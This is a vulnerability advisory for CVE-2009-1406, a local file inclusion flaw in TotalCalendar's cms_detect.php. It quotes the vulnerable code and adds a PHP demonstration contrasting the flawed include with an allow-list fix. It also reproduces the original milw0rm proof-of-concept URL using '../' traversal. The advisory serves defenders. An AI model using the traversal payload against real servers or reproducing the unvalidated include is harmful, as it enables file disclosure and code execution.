Sweetphp TotalCalendar 'cms_detect.php' Local File Inclusion Vulnerability

Vulnerability ID: 1117631
Vulnerability type: Path traversal
Published: 2009-04-21
Updated: 2009-06-15
CVE ID: CVE-2009-1406
CNNVD ID: CNNVD-200904-475
Platform: PHP
CVSS score: 6.8
|Vulnerability sources
https://www.exploit-db.com/exploits/8503
https://cxsecurity.com/issue/WLB-2009040232
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-475
|Vulnerability details
TotalCalendar is a web-based calendar and schedule management system. The cms_detect.php script in TotalCalendar does not validate the value passed in the include request parameter before using it in a file include: the parameter is concatenated onto the include directory and handed straight to require_once(). A remote attacker can therefore supply directory-traversal sequences ("../") in the include parameter to include arbitrary files from the local filesystem, and any PHP code in the included file is executed by the web server. The vulnerable code in cms_detect.php:
-------------------------------------------------------------------------------
Line 26 : $include = isset($_REQUEST['include']) ? $_REQUEST['include'] : null;
Line 115 : if(!empty($include)) require_once($inc_dir.$include);
-------------------------------------------------------------------------------
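The following is an added example, not TotalCalendar's own code. It models the include resolution on line 115 of cms_detect.php (the bare $inc_dir.$include concatenation) next to a hardened replacement that allow-lists the file name and re-checks the canonicalised path against the include directory. The include directory, the allow-listed file name and the files it creates are constructed for the demonstration and are not taken from the product.

```php
<?php
// Added example: models the vulnerable include resolution in TotalCalendar's
// cms_detect.php and a hardened version. Directory and file names below are
// assumptions made for the demonstration, not TotalCalendar's real layout.

declare(strict_types=1);

// Vulnerable behaviour, as on line 115 of cms_detect.php: the request-controlled
// value is appended to the include directory with no validation, so "../"
// sequences walk out of $incDir and require_once() loads whatever results.
function vulnerableIncludePath(string $incDir, ?string $include): ?string
{
    if (empty($include)) {
        return null;
    }
    return $incDir . $include;
}

// Hardened replacement: only a fixed set of known include files is accepted,
// and the resolved path is re-checked against the base directory after
// canonicalisation so that traversal sequences and symlinks cannot escape it.
function safeIncludePath(string $incDir, ?string $include, array $allowed): ?string
{
    if ($include === null || $include === '') {
        return null;
    }
    // 1. Reject anything that is not a plain, allow-listed file name.
    if (!in_array($include, $allowed, true)) {
        return null;
    }
    // 2. Canonicalise both sides and verify the target is still inside $incDir.
    $base = realpath($incDir);
    $path = realpath($incDir . DIRECTORY_SEPARATOR . $include);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// --- Self-contained demonstration on a constructed temporary directory ---
$root   = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tc_lfi_demo_' . getmypid();
$incDir = $root . DIRECTORY_SEPARATOR . 'includes' . DIRECTORY_SEPARATOR;
mkdir($incDir, 0700, true);
// One legitimate adapter inside the include directory (constructed name) and
// one file outside it that an attacker should never be able to reach.
file_put_contents($incDir . 'example_cms.php', "<?php // legitimate adapter\n");
file_put_contents($root . DIRECTORY_SEPARATOR . 'outside.txt', "outside the include dir\n");

$allowed = ['example_cms.php'];
$attack  = '../outside.txt';   // same shape as the PoC's ../../../ traversal

printf("vulnerable, attack    : %s\n", vulnerableIncludePath($incDir, $attack));
printf("hardened,   attack    : %s\n", var_export(safeIncludePath($incDir, $attack, $allowed), true));
printf("hardened,   legitimate: %s\n", safeIncludePath($incDir, 'example_cms.php', $allowed));

// Clean up the constructed files.
unlink($root . DIRECTORY_SEPARATOR . 'outside.txt');
unlink($incDir . 'example_cms.php');
rmdir($incDir);
rmdir($root);
```

Run it with `php` from the command line. The vulnerable resolver returns a path that points outside the include directory, the hardened resolver rejects the same input because it is not on the allow-list (and would also reject it at the realpath containment check if the allow-list were ever loosened), while the legitimate file name still resolves. The allow-list is the primary control; the realpath check is defence in depth against a later maintainer widening the allow-list or against symlinks inside the include directory.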
|Exploit
##########################################################################################
[+] TotalCalendar 2.4 (include) Local File Inclusion
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
##########################################################################################

[+] Local File Inclusion

Vulnerable code in cms_detect.php:

-------------------------------------------------------------------------------
Line 26 : $include = isset($_REQUEST['include']) ? $_REQUEST['include'] : null;
Line 115 : if(!empty($include)) require_once($inc_dir.$include);
-------------------------------------------------------------------------------

  PoC :

   http://127.0.0.1/[path]/cms_detect.php?include=../../../../../../BOOTSECT.BAK

##########################################################################################

# milw0rm.com [2009-04-21]
|References

Source: XF
Name: totalcalendar-cmsdetect-file-include(49980)
Link: http://xforce.iss.net/xforce/xfdb/49980
Source: BID
Name: 34634
Link: http://www.securityfocus.com/bid/34634
Source: MILW0RM
Name: 8503
Link: http://www.milw0rm.com/exploits/8503
Source: SECUNIA
Name: 34824
Link: http://secunia.com/advisories/34824